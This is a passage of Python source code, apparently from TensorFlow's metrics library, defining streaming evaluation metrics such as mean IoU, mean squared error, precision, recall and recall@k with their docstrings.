labels, predictions, num_classes, weights=weights, dtype=cm_dtype)
update_op = state_ops.assign_add(total_cm, current_cm)
def compute_mean_iou(name):
"""Compute the mean intersection-over-union via the confusion matrix."""
sum_over_row = math_ops.to_float(math_ops.reduce_sum(total_cm, 0))
sum_over_col = math_ops.to_float(math_ops.reduce_sum(total_cm, 1))
cm_diag = math_ops.to_float(array_ops.diag_part(total_cm))
denominator = sum_over_row + sum_over_col - cm_diag
# If the value of the denominator is 0, set it to 1 to avoid
# zero division.
denominator = array_ops.where(
math_ops.greater(denominator, 0),
denominator,
array_ops.ones_like(denominator))
iou = math_ops.div(cm_diag, denominator)
return math_ops.reduce_mean(iou, name=name)
mean_iou_v = compute_mean_iou('mean_iou')
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_iou_v)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_iou_v, update_op
def mean_relative_error(labels, predictions, normalizer, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean relative error by normalizing with the given values.
The `mean_relative_error` function creates two local variables,
`total` and `count` that are used to compute the mean relative absolute error.
This average is weighted by `weights`, and it is ultimately returned as
`mean_relative_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_reative_error`. Internally, a `relative_errors` operation divides the
absolute value of the differences between `predictions` and `labels` by the
`normalizer`. Then `update_op` increments `total` with the reduced sum of the
product of `weights` and `relative_errors`, and it increments `count` with the
reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
normalizer: A `Tensor` of the same shape as `predictions`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_relative_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_relative_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_relative_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
predictions, normalizer = confusion_matrix.remove_squeezable_dimensions(
predictions, normalizer)
predictions.get_shape().assert_is_compatible_with(normalizer.get_shape())
relative_errors = array_ops.where(
math_ops.equal(normalizer, 0.0),
array_ops.zeros_like(labels),
math_ops.div(math_ops.abs(labels - predictions), normalizer))
return mean(relative_errors, weights, metrics_collections,
updates_collections, name or 'mean_relative_error')
def mean_squared_error(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean squared error between the labels and predictions.
The `mean_squared_error` function creates two local variables,
`total` and `count` that are used to compute the mean squared error.
This average is weighted by `weights`, and it is ultimately returned as
`mean_squared_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_squared_error`. Internally, a `squared_error` operation computes the
element-wise square of the difference between `predictions` and `labels`. Then
`update_op` increments `total` with the reduced sum of the product of
`weights` and `squared_error`, and it increments `count` with the reduced sum
of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_squared_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_squared_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_squared_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
squared_error = math_ops.square(labels - predictions)
return mean(squared_error, weights, metrics_collections,
updates_collections, name or 'mean_squared_error')
def mean_tensor(values, weights=None, metrics_collections=None,
updates_collections=None, name=None):
"""Computes the element-wise (weighted) mean of the given tensors.
In contrast to the `mean` function which returns a scalar with the
mean, this function returns an average tensor with the same shape as the
input tensors.
The `mean_tensor` function creates two local variables,
`total_tensor` and `count_tensor` that are used to compute the average of
`values`. This average is ultimately returned as `mean` which is an idempotent
operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean`.
`update_op` increments `total` with the reduced sum of the product of `values`
and `weights`, and it increments `count` with the reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `Tensor` of arbitrary dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that `mean`
should be added to.
updates_collections: An optional list of collections that `update_op`
should be added to.
name: An optional variable_scope name.
Returns:
mean: A float `Tensor` representing the current mean, the value of `total`
divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_value`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
with variable_scope.variable_scope(name, 'mean', (values, weights)):
values = math_ops.to_float(values)
total = _create_local('total_tensor', shape=values.get_shape())
count = _create_local('count_tensor', shape=values.get_shape())
num_values = array_ops.ones_like(values)
if weights is not None:
weights = _broadcast_weights(math_ops.to_float(weights), values)
values = math_ops.multiply(values, weights)
num_values = math_ops.multiply(num_values, weights)
total_compute_op = state_ops.assign_add(total, values)
count_compute_op = state_ops.assign_add(count, num_values)
def compute_mean(total, count, name):
non_zero_count = math_ops.maximum(count,
array_ops.ones_like(count),
name=name)
return math_ops.truediv(total, non_zero_count, name=name)
mean_t = compute_mean(total, count, 'value')
with ops.control_dependencies([total_compute_op, count_compute_op]):
update_op = compute_mean(total, count, 'update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_t)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_t, update_op
def percentage_below(values, threshold, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the percentage of values less than the given threshold.
The `percentage_below` function creates two local variables,
`total` and `count` that are used to compute the percentage of `values` that
fall below `threshold`. This rate is weighted by `weights`, and it is
ultimately returned as `percentage` which is an idempotent operation that
simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`percentage`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A numeric `Tensor` of arbitrary size.
threshold: A scalar threshold.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
percentage: A `Tensor` representing the current mean, the value of `total`
divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
is_below_threshold = math_ops.to_float(math_ops.less(values, threshold))
return mean(is_below_threshold,
weights,
metrics_collections,
updates_collections,
name or 'percentage_below_threshold')
def _count_condition(values, weights=None, metrics_collections=None,
updates_collections=None):
"""Sums the weights of cases where the given values are True.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `bool` `Tensor` of arbitrary size.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
check_ops.assert_type(values, dtypes.bool)
count = _create_local('count', shape=[])
values = math_ops.to_float(values)
if weights is not None:
with ops.control_dependencies((
check_ops.assert_rank_in(weights, (0, array_ops.rank(values))),)):
weights = math_ops.to_float(weights)
values = math_ops.multiply(values, weights)
value_tensor = array_ops.identity(count)
update_op = state_ops.assign_add(count, math_ops.reduce_sum(values))
if metrics_collections:
ops.add_to_collections(metrics_collections, value_tensor)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return value_tensor, update_op
def true_positives(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Sum the weights of true_positives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `bool` `Tensor` whose dimensions must
match `predictions`.
predictions: The predicted values, a `bool` `Tensor` of arbitrary
dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'true_positives', (predictions, labels, weights)):
predictions = ops.convert_to_tensor(predictions)
labels = ops.convert_to_tensor(labels)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
is_true_positive = math_ops.logical_and(math_ops.equal(labels, 1),
math_ops.equal(predictions, 1))
return _count_condition(is_true_positive, weights, metrics_collections,
updates_collections)
def false_positives(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Sum the weights of false positives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `bool` `Tensor` whose dimensions must
match `predictions`.
predictions: The predicted values, a `bool` `Tensor` of arbitrary
dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'false_positives', (predictions, labels, weights)):
predictions = ops.convert_to_tensor(predictions)
labels = ops.convert_to_tensor(labels)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
is_false_positive = math_ops.logical_and(math_ops.equal(labels, 0),
math_ops.equal(predictions, 1))
return _count_condition(is_false_positive, weights, metrics_collections,
updates_collections)
def precision(labels, predictions, weights=None,
metrics_collections=None, updates_collections=None,
name=None):
"""Computes the precision of the predictions with respect to the labels.
The `precision` function creates two local variables,
`true_positives` and `false_positives`, that are used to compute the
precision. This value is ultimately returned as `precision`, an idempotent
operation that simply divides `true_positives` by the sum of `true_positives`
and `false_positives`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision`. `update_op` weights each prediction by the corresponding value in
`weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `bool` `Tensor` whose dimensions must
match `predictions`.
predictions: The predicted values, a `bool` `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `precision` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
precision: Scalar float `Tensor` with the value of `true_positives`
divided by the sum of `true_positives` and `false_positives`.
update_op: `Operation` that increments `true_positives` and
`false_positives` variables appropriately and whose value matches
`precision`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'precision', (predictions, labels, weights)):
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
true_p, true_positives_update_op = true_positives(
labels, predictions, weights, metrics_collections=None,
updates_collections=None, name=None)
false_p, false_positives_update_op = false_positives(
labels, predictions, weights, metrics_collections=None,
updates_collections=None, name=None)
def compute_precision(name):
return array_ops.where(
math_ops.greater(true_p + false_p, 0),
math_ops.div(true_p, true_p + false_p),
0,
name)
p = compute_precision('value')
with ops.control_dependencies([true_positives_update_op,
false_positives_update_op]):
update_op = compute_precision('update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, p)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return p, update_op
def precision_at_thresholds(labels, predictions, thresholds,
weights=None,
metrics_collections=None,
updates_collections=None, name=None):
"""Computes precision values for different `thresholds` on `predictions`.
The `precision_at_thresholds` function creates four local variables,
`true_positives`, `true_negatives`, `false_positives` and `false_negatives`
for various values of thresholds. `precision[i]` is defined as the total
weight of values in `predictions` above `thresholds[i]` whose corresponding
entry in `labels` is `True`, divided by the total weight of values in
`predictions` above `thresholds[i]` (`true_positives[i] / (true_positives[i] +
false_positives[i])`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `bool` `Tensor` whose shape matches `predictions`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `auc` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
precision: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables that
are used in the computation of `precision`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(name, 'precision_at_thresholds',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights, includes=('tp', 'fp'))
tp = values['tp']
fp = values['fp']
# Avoid division by zero.
epsilon = 1e-7
def compute_precision(name):
return math_ops.div(tp, epsilon + tp + fp, name='precision_' + name)
prec = compute_precision('value')
with ops.control_dependencies(update_ops.values()):
update_op = compute_precision('update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, prec)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return prec, update_op
def false_negatives(labels, predictions, weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the total number of false positives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `bool` `Tensor` whose dimensions must
match `predictions`.
predictions: The predicted values, a `bool` `Tensor` of arbitrary
dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
with variable_scope.variable_scope(
name, 'false_negatives', (predictions, labels, weights)):
predictions = ops.convert_to_tensor(predictions)
labels = ops.convert_to_tensor(labels)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
is_false_negative = math_ops.logical_and(math_ops.equal(labels, 1),
math_ops.equal(predictions, 0))
return _count_condition(is_false_negative, weights, metrics_collections,
updates_collections)
def recall(labels, predictions, weights=None,
metrics_collections=None, updates_collections=None,
name=None):
"""Computes the recall of the predictions with respect to the labels.
The `recall` function creates two local variables, `true_positives`
and `false_negatives`, that are used to compute the recall. This value is
ultimately returned as `recall`, an idempotent operation that simply divides
`true_positives` by the sum of `true_positives` and `false_negatives`.
For estimation of the metric over a stream of data, the function creates an
`update_op` that updates these variables and returns the `recall`. `update_op`
weights each prediction by the corresponding value in `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `bool` `Tensor` whose dimensions must
match `predictions`.
predictions: The predicted values, a `bool` `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `recall` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
recall: Scalar float `Tensor` with the value of `true_positives` divided
by the sum of `true_positives` and `false_negatives`.
update_op: `Operation` that increments `true_positives` and
`false_negatives` variables appropriately and whose value matches
`recall`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
"""
with variable_scope.variable_scope(
name, 'recall', (predictions, labels, weights)):
labels, predictions, weights = _remove_squeezable_dimensions(
labels, predictions, weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
true_p, true_positives_update_op = true_positives(
labels, predictions, weights, metrics_collections=None,
updates_collections=None, name=None)
false_n, false_negatives_update_op = false_negatives(
labels, predictions, weights, metrics_collections=None,
updates_collections=None, name=None)
def compute_recall(true_p, false_n, name):
return array_ops.where(
math_ops.greater(true_p + false_n, 0),
math_ops.div(true_p, true_p + false_n),
0,
name)
rec = compute_recall(true_p, false_n, 'value')
with ops.control_dependencies([true_positives_update_op,
false_negatives_update_op]):
update_op = compute_recall(true_p, false_n, 'update_op')
if metrics_collections:
ops.add_to_collections(metrics_collections, rec)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return rec, update_op
def _at_k_name(name, k=None, class_id=None):
if k is not None:
name = '%s_at_%d' % (name, k)
else:
name = '%s_at_k' % (name)
if class_id is not None:
name = '%s_class%d' % (name, class_id)
return name
def _select_class_id(ids, selected_id):
"""Filter all but `selected_id` out of `ids`.
Args:
ids: `int64` `Tensor` or `SparseTensor` of IDs.
selected_id: Int id to select.
Returns:
`SparseTensor` of same dimensions as `ids`. This contains only the entries
equal to `selected_id`.
"""
ids = sparse_tensor.convert_to_tensor_or_sparse_tensor(ids)
if isinstance(ids, sparse_tensor.SparseTensor):
return sparse_ops.sparse_retain(
ids, math_ops.equal(ids.values, selected_id))
# TODO(ptucker): Make this more efficient, maybe add a sparse version of
# tf.equal and tf.reduce_any?
# Shape of filled IDs is the same as `ids` with the last dim collapsed to 1.
ids_shape = array_ops.shape(ids, out_type=dtypes.int64)
ids_last_dim = array_ops.size(ids_shape) - 1
filled_selected_id_shape = math_ops.reduced_shape(
ids_shape, array_ops.reshape(ids_last_dim, [1]))
# Intersect `ids` with the selected ID.
filled_selected_id = array_ops.fill(
filled_selected_id_shape, math_ops.to_int64(selected_id))
result = sets.set_intersection(filled_selected_id, ids)
return sparse_tensor.SparseTensor(
indices=result.indices, values=result.values, dense_shape=ids_shape)
def _maybe_select_class_id(labels, predictions_idx, selected_id=None):
"""If class ID is specified, filter all other classes.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: `int64` `Tensor` of class IDs, with shape [D1, ... DN, k]
where N >= 1. Commonly, N=1 and `predictions_idx` has shape
[batch size, k].
selected_id: Int id to select.
Returns:
Tuple of `labels` and `predictions_idx`, possibly with classes removed.
"""
if selected_id is None:
return labels, predictions_idx
return (_select_class_id(labels, selected_id),
_select_class_id(predictions_idx, selected_id))
def _sparse_true_positive_at_k(labels,
predictions_idx,
class_id=None,
weights=None,
name=None):
"""Calculates true positives for recall@k and precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of operation.
Returns:
A [D1, ... DN] `Tensor` of true positive counts.
"""
with ops.name_scope(
name, 'true_positives', (predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(
labels, predictions_idx, class_id)
tp = sets.set_size(sets.set_intersection(predictions_idx, labels))
tp = math_ops.to_double(tp)
if weights is not None:
with ops.control_dependencies((_assert_weights_rank(weights, tp),)):
weights = math_ops.to_double(weights)
tp = math_ops.multiply(tp, weights)
return tp
def _streaming_sparse_true_positive_at_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step true positives for recall@k and precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incomptable shape.
"""
with ops.name_scope(
name, _at_k_name('true_positive', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
tp = _sparse_true_positive_at_k(
predictions_idx=predictions_idx, labels=labels, class_id=class_id,
weights=weights)
batch_total_tp = math_ops.to_double(math_ops.reduce_sum(tp))
var = _local_variable(array_ops.zeros([], dtype=dtypes.float64), name=scope)
return var, state_ops.assign_add(var, batch_total_tp, name='update')
def _sparse_false_negative_at_k(labels,
predictions_idx,
class_id=None,
weights=None):
"""Calculates false negatives for recall@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
Returns:
A [D1, ... DN] `Tensor` of false negative counts.
"""
with ops.name_scope(
None, 'false_negatives', (predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(labels,
predictions_idx,
class_id)
fn = sets.set_size(sets.set_difference(predictions_idx,
labels,
aminusb=False))
fn = math_ops.to_double(fn)
if weights is not None:
with ops.control_dependencies((_assert_weights_rank(weights, fn),)):
weights = math_ops.to_double(weights)
fn = math_ops.multiply(fn, weights)
return fn
def _streaming_sparse_false_negative_at_k(labels,
predictions_idx,
k,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step false negatives for recall@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incomptable shape.
"""
with ops.name_scope(
name, _at_k_name('false_negative', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
fn = _sparse_false_negative_at_k(
predictions_idx=predictions_idx, labels=labels, class_id=class_id,
weights=weights)
batch_total_fn = math_ops.to_double(math_ops.reduce_sum(fn))
var = _local_variable(array_ops.zeros([], dtype=dtypes.float64), name=scope)
return var, state_ops.assign_add(var, batch_total_fn, name='update')
def recall_at_k(labels,
predictions,
k,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes recall@k of the predictions with respect to sparse labels.
If `class_id` is specified, we calculate recall by considering only the
entries in the batch for which `class_id` is in the label, and computing
the fraction of them for which `class_id` is in the top-k `predictions`.
If `class_id` is not specified, we'll calculate recall as how often on
average a class among the labels of a batch entry is in the top-k
`predictions`.
`sparse_recall_at_k` creates two local variables,
`true_positive_at_<k>` and `false_negative_at_<k>`, that are used to compute
the recall_at_k frequency. This frequency is ultimately returned as
`recall_at_<k>`: an idempotent operation that simply divides
`true_positive_at_<k>` by total (`true_positive_at_<k>` +
`false_negative_at_<k>`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`recall_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false negatives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_negative_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range always count
towards `false_negative_at_<k>`.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and predictions has shape [batch size, num_classes].
The final dimension contains the logit values for each class. [D1, ... DN]
must match `labels`.
k: Integer, k for @k metric.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes), where num_classes is the last dimension of
`predictions`. If class_id is outside this range, the method returns NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
recall: Scalar `float64` `Tensor` with the value of `true_positives` divided
by the sum of `true_positives` and `false_negatives`.
update_op: `Operation` that increments `true_positives` and
`false_negatives` variables appropriately, and whose value matches
`recall`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
"""
with ops.name_scope(
name, _at_k_name('recall', k, class_id=class_id),
(predictions, labels, weights)) as scope:
